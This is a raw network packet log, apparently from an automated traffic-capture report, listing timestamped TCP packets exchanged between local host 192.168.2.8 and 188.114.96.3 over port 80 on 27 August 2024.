                                Aug 27, 2024 09:49:39.070066929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070091963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070103884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070115089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070127010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070135117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070137978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070152044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070152044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070163012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070173979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070177078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070185900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070197105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070202112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070208073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070219040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070219994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070266008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070344925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070355892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070367098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070379019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070395947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070427895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070477962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070488930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070499897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070509911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070513964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070521116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070533037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070542097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070569038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070617914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070633888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070645094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070656061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070661068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070667982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070679903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070683956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070691109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070707083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070708036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070719004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070730925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070751905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070760965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070763111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070774078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070796967 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070995092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071006060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071017027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071027994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071032047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071038961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071049929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071050882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071060896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071072102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071079016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071083069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071094036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071105003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071110964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071115971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071126938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071140051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071140051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071151018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071162939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071177006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071199894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071365118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071376085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071386099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071399927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071409941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071413040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071419001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071429014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071439981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071450949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071450949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071461916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071472883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071475029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071485043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071490049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071496964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071511030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071526051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071563959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071892023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071902990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071913958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071924925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071937084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071940899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071947098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071959972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071968079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.071970940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071981907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071993113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.071995020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072026014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072029114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072038889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072045088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072051048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072062016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072073936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072081089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072094917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072181940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072194099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072205067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072218895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072221994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072231054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072240114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072242022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072252989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072264910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072267056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072283030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072285891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072295904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072326899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072339058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072340012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072350979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072362900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072369099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072374105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072386026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072391987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072397947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072415113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072451115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072477102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072494984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072505951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072514057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072525024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072537899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072547913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072561026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072563887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072577953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072590113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072598934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072602987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072613955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072628021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072639942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072640896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072647095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072652102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072658062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072659016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072670937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072680950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072689056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072694063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072704077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072715998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.072716951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.072750092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073081017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073092937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073101997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073108912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073121071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073138952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073175907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073402882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073415041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073426008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073453903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073492050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073503017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073514938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073528051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073540926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073565960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073638916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073649883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073659897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073672056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073683023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073683977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073693037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073695898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073708057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073719978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073721886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073731899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073748112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073767900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073780060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073905945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073916912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073926926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073939085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073951006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073951960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073962927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073972940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073976994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.073985100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.073990107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074014902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074181080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074191093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074201107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074213982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074224949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074229956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074240923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074249029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074251890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074264050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074268103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074275970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074286938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074295044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074299097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074317932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074350119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074537039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074548006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074558020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074577093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074588060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074593067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074599981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074606895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074610949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074623108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074634075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074644089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074645042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074655056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074659109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074666977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074678898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074686050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074690104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074701071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074703932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074712038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074728012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.074737072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.074763060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.075026989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075037003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075047016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075074911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.075098038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.075112104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075124025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075134039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.075161934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.117367983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.158621073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158633947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158644915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158701897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.158770084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158782005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158795118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158807039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158807993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.158818960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158833027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.158863068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.158917904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158930063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.158968925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159068108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159079075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159089088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159101009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159117937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159137011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159218073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159229040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159239054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159250975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159262896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159276009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159307957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159368992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159380913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159390926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159401894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159409046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159420013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159429073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159432888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159445047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159471989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159492016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159660101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159672022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159682989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159693956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159704924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159708023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159730911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159816980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159828901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159842014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159852982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159854889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159863949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159876108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159878969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159887075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159898996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159898996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159914970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.159966946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159981966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.159995079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160007000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160007954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160043955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160265923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160278082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160289049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160306931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160319090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160418987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160429955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160440922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160453081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160464048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160465956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160475969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160492897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160495043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160506010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160516977 CEST8049715188.114.96.3192.168.2.8
